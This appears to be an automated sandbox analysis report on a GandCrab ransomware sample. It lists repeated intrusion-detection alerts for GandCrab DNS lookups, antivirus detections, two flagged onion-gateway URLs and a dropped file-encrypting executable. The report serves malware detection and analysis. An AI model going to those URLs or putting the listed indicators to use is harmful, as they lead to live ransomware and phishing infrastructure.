Timestamp:	192.168.2.68.8.8.849469532026737 08/31/22-23:50:44.340126
SID:	2026737
Source Port:	49469
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852868532829500 08/31/22-23:49:26.794257
SID:	2829500
Source Port:	52868
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854905532829500 08/31/22-23:48:50.163893
SID:	2829500
Source Port:	54905
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860000532026737 08/31/22-23:50:04.486610
SID:	2026737
Source Port:	60000
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862851532829500 08/31/22-23:49:39.232388
SID:	2829500
Source Port:	62851
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852485532026737 08/31/22-23:49:02.321191
SID:	2026737
Source Port:	52485
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861614532829500 08/31/22-23:49:00.931789
SID:	2829500
Source Port:	61614
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864545532026737 08/31/22-23:50:11.805562
SID:	2026737
Source Port:	64545
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.850346532026737 08/31/22-23:49:17.336643
SID:	2026737
Source Port:	50346
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862853532829500 08/31/22-23:49:39.272143
SID:	2829500
Source Port:	62853
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854205532026737 08/31/22-23:50:33.702038
SID:	2026737
Source Port:	54205
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856361532829500 08/31/22-23:50:13.505571
SID:	2829500
Source Port:	56361
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.863675532829500 08/31/22-23:50:38.501186
SID:	2829500
Source Port:	63675
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.857517532829498 08/31/22-23:49:46.187199
SID:	2829498
Source Port:	57517
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856091532829500 08/31/22-23:49:06.177940
SID:	2829500
Source Port:	56091
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854300532829500 08/31/22-23:50:47.016428
SID:	2829500
Source Port:	54300
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854907532829500 08/31/22-23:48:50.267487
SID:	2829500
Source Port:	54907
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852848532026737 08/31/22-23:50:18.768533
SID:	2026737
Source Port:	52848
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856088532829500 08/31/22-23:49:06.118498
SID:	2829500
Source Port:	56088
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851325532829500 08/31/22-23:49:50.167078
SID:	2829500
Source Port:	51325
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856300532829500 08/31/22-23:50:22.423249
SID:	2829500
Source Port:	56300
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849236532026737 08/31/22-23:49:22.885858
SID:	2026737
Source Port:	49236
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.858161532829500 08/31/22-23:50:17.209347
SID:	2829500
Source Port:	58161
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.850254532829498 08/31/22-23:50:34.167189
SID:	2829498
Source Port:	50254
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856753532829498 08/31/22-23:49:57.561313
SID:	2829498
Source Port:	56753
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860694532026737 08/31/22-23:49:57.058875
SID:	2026737
Source Port:	60694
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851535532026737 08/31/22-23:48:55.066318
SID:	2026737
Source Port:	51535
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861612532829500 08/31/22-23:49:00.891035
SID:	2829500
Source Port:	61612
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856432532829498 08/31/22-23:50:42.072023
SID:	2829498
Source Port:	56432
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864965532829498 08/31/22-23:50:19.877923
SID:	2829498
Source Port:	64965
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860002532026737 08/31/22-23:50:04.523120
SID:	2026737
Source Port:	60002
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.857324532026737 08/31/22-23:49:33.965954
SID:	2026737
Source Port:	57324
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.858921532829500 08/31/22-23:49:15.846001
SID:	2829500
Source Port:	58921
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860692532026737 08/31/22-23:49:57.020058
SID:	2026737
Source Port:	60692
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862542532026737 08/31/22-23:50:35.921513
SID:	2026737
Source Port:	62542
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856126532829498 08/31/22-23:49:24.882022
SID:	2829498
Source Port:	56126
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864964532829498 08/31/22-23:50:19.857963
SID:	2829498
Source Port:	64964
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856298532829500 08/31/22-23:50:22.380545
SID:	2829500
Source Port:	56298
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862768532829498 08/31/22-23:49:54.327766
SID:	2829498
Source Port:	62768
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860003532026737 08/31/22-23:50:04.543015
SID:	2026737
Source Port:	60003
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853595532829498 08/31/22-23:50:12.473746
SID:	2829498
Source Port:	53595
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861092532026737 08/31/22-23:49:53.354265
SID:	2026737
Source Port:	61092
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854298532829500 08/31/22-23:50:46.975693
SID:	2829500
Source Port:	54298
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856433532829500 08/31/22-23:50:42.407533
SID:	2829500
Source Port:	56433
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.850347532026737 08/31/22-23:49:17.355597
SID:	2026737
Source Port:	50347
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854299532829500 08/31/22-23:50:46.996273
SID:	2829500
Source Port:	54299
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861172532026737 08/31/22-23:50:41.082366
SID:	2026737
Source Port:	61172
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853594532829498 08/31/22-23:50:12.453787
SID:	2829498
Source Port:	53594
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864406532829498 08/31/22-23:49:37.435154
SID:	2829498
Source Port:	64406
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862542532829498 08/31/22-23:48:47.509378
SID:	2829498
Source Port:	62542
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.850257532829498 08/31/22-23:50:34.225599
SID:	2829498
Source Port:	50257
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856299532829500 08/31/22-23:50:22.403218
SID:	2829500
Source Port:	56299
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851890532829498 08/31/22-23:50:24.350751
SID:	2829498
Source Port:	51890
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862541532829498 08/31/22-23:48:47.488892
SID:	2829498
Source Port:	62541
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.855961532026737 08/31/22-23:49:42.910756
SID:	2026737
Source Port:	55961
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856755532829498 08/31/22-23:49:57.601932
SID:	2829498
Source Port:	56755
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856127532829498 08/31/22-23:49:24.900788
SID:	2829498
Source Port:	56127
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853197532829498 08/31/22-23:50:30.133681
SID:	2829498
Source Port:	53197
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851533532026737 08/31/22-23:48:55.025305
SID:	2026737
Source Port:	51533
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861093532026737 08/31/22-23:49:53.372548
SID:	2026737
Source Port:	61093
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.855633532829498 08/31/22-23:49:19.667081
SID:	2829498
Source Port:	55633
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.858162532829500 08/31/22-23:50:17.227551
SID:	2829500
Source Port:	58162
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856431532829498 08/31/22-23:50:42.053871
SID:	2829498
Source Port:	56431
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852870532829500 08/31/22-23:49:26.845476
SID:	2829500
Source Port:	52870
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.858159532829500 08/31/22-23:50:17.168323
SID:	2829500
Source Port:	58159
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853046532829500 08/31/22-23:50:24.891150
SID:	2829500
Source Port:	53046
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853043532829500 08/31/22-23:50:24.832633
SID:	2829500
Source Port:	53043
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859884532829498 08/31/22-23:49:13.387386
SID:	2829498
Source Port:	59884
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851367532026737 08/31/22-23:50:14.061249
SID:	2026737
Source Port:	51367
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.858919532829500 08/31/22-23:49:15.787076
SID:	2829500
Source Port:	58919
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862737532829500 08/31/22-23:49:54.897559
SID:	2829500
Source Port:	62737
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864651532026737 08/31/22-23:50:23.369931
SID:	2026737
Source Port:	64651
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856572532829500 08/31/22-23:49:21.410257
SID:	2829500
Source Port:	56572
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.858922532829500 08/31/22-23:49:15.872217
SID:	2829500
Source Port:	58922
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864546532026737 08/31/22-23:50:11.917623
SID:	2026737
Source Port:	64546
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.863268532829500 08/31/22-23:50:03.935068
SID:	2829500
Source Port:	63268
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849467532026737 08/31/22-23:50:44.300593
SID:	2026737
Source Port:	49467
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856089532829500 08/31/22-23:49:06.139177
SID:	2829500
Source Port:	56089
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854882532829498 08/31/22-23:50:45.662904
SID:	2829498
Source Port:	54882
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854512532026737 08/31/22-23:50:27.967773
SID:	2026737
Source Port:	54512
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859339532829500 08/31/22-23:49:59.087833
SID:	2829500
Source Port:	59339
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862770532829498 08/31/22-23:49:54.371674
SID:	2829498
Source Port:	62770
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856752532829498 08/31/22-23:49:57.536553
SID:	2829498
Source Port:	56752
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852719532026737 08/31/22-23:50:01.237344
SID:	2026737
Source Port:	52719
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856362532829500 08/31/22-23:50:13.529988
SID:	2829500
Source Port:	56362
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852820532829500 08/31/22-23:50:08.063038
SID:	2829500
Source Port:	52820
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854204532026737 08/31/22-23:50:33.679529
SID:	2026737
Source Port:	54204
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864409532829498 08/31/22-23:49:37.527288
SID:	2829498
Source Port:	64409
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864543532026737 08/31/22-23:50:11.740058
SID:	2026737
Source Port:	64543
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852483532026737 08/31/22-23:49:02.284760
SID:	2026737
Source Port:	52483
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853948532829498 08/31/22-23:49:04.012398
SID:	2829498
Source Port:	53948
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862224532829498 08/31/22-23:50:03.259743
SID:	2829498
Source Port:	62224
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851326532829500 08/31/22-23:49:50.186179
SID:	2829500
Source Port:	51326
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860012532829500 08/31/22-23:50:33.110094
SID:	2829500
Source Port:	60012
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861611532829500 08/31/22-23:49:00.850076
SID:	2829500
Source Port:	61611
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851364532026737 08/31/22-23:50:13.994431
SID:	2026737
Source Port:	51364
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849235532026737 08/31/22-23:49:22.865636
SID:	2026737
Source Port:	49235
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: eW1QrimJYd.exe	Virustotal: Detection: 82%	Perma Link
Source: eW1QrimJYd.exe	Metadefender: Detection: 85%	Perma Link
Source: eW1QrimJYd.exe	ReversingLabs: Detection: 100%

Antivirus / Scanner detection for submitted sample

Source: eW1QrimJYd.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://gdcbghvjyqy7jclk.onion.casa/5432c2cfc05a5a97	Avira URL Cloud: Label: malware
Source: http://gdcbghvjyqy7jclk.onion.top/5432c2cfc05a5a97	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe

Avira: detection malicious, Label: TR/FileCoder.oytet

Machine Learning detection for sample

Source: eW1QrimJYd.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe

Joe Sandbox ML: detected

